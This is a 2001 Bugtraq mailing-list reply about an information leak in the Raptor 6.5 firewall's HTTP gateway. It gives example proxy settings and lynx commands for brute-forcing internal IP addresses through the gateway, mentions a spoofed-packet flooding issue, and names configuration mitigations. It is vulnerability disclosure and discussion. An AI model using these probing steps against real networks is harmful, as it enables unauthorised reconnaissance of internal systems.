Bugtraq mailing list archives
Re: Raptor 6.5 http vulnerability
From: Alexander Bochmann <ab () GXIS DE>
Date: Tue, 27 Mar 2001 00:26:32 +0200
Hi, ...on Mon, Mar 26, 2001 at 10:34:30PM +0200, Lysel Christian Emre wrote:
I already noticed some months ago that the Raptor (6.0.2) firewall's http gateway possibly leaks information about an internal network with the method you described, if redirectedIt does not leaks information about the internal network. The apache webserver can leak information from error pages:
It does, because by trial-and-error, you can find out about IP addresses used on an internal interface with connections from an outside interface, with basically the same method as you described it, and by just monitoring the answers returned by the firewall. (On another note, at least with 6.5, if spoofing protection isn't activated and configured correctly on the internal interfaces, you can also flood the internal network with packets generated by the firewall as answer to (spoofed) packets on the outside interface - if you know the networks used internally.)
It's possible to brute-force IP addresses used on a DMZ network: If you use the http gateway on the external interface as proxy, you can access internal IPs (and internal DNS names) directly - just try them all ;)This should generate some logs!
As always, there has to be someone watching them.
And can also be blocked by: http.urlpatternExample:setenv http_proxy http://external.firewall.name:80/Now go on with something like...lynx -mime_header http://192.168.95.2:80/HTTP/1.1 503 Service Unavailable Server: Simple, Secure Web Server 1.1 [.. etc ..]This is the internal interface for the firewall, right?
Right, but as I said, this request can be sent from the outside interface. You can also use internal DNS names from an outside interface when addressing the http gateway as proxy, but I think these are usually more difficult to find out, unless you have an additional information source.
...or, if you are lucky, an answer from a web server: % lynx -mime_header http://192.168.95.74:80/And this is a request to the webserver?
Yes, located on an internal network.
http.remove-header, should remove the headers :)
I didn't know that one... But I don't think it would help, as an IP address with a working web server on it will usually return an answer that doesn't look like the error page of the http gateway on the Raptor, which will be indication enough you have found a valid internal IP, and can go on from there. Alex.
Current thread:
- Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 25)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Erik Groennerud (Mar 27)
- <Possible follow-ups>
- Re: Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 27)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)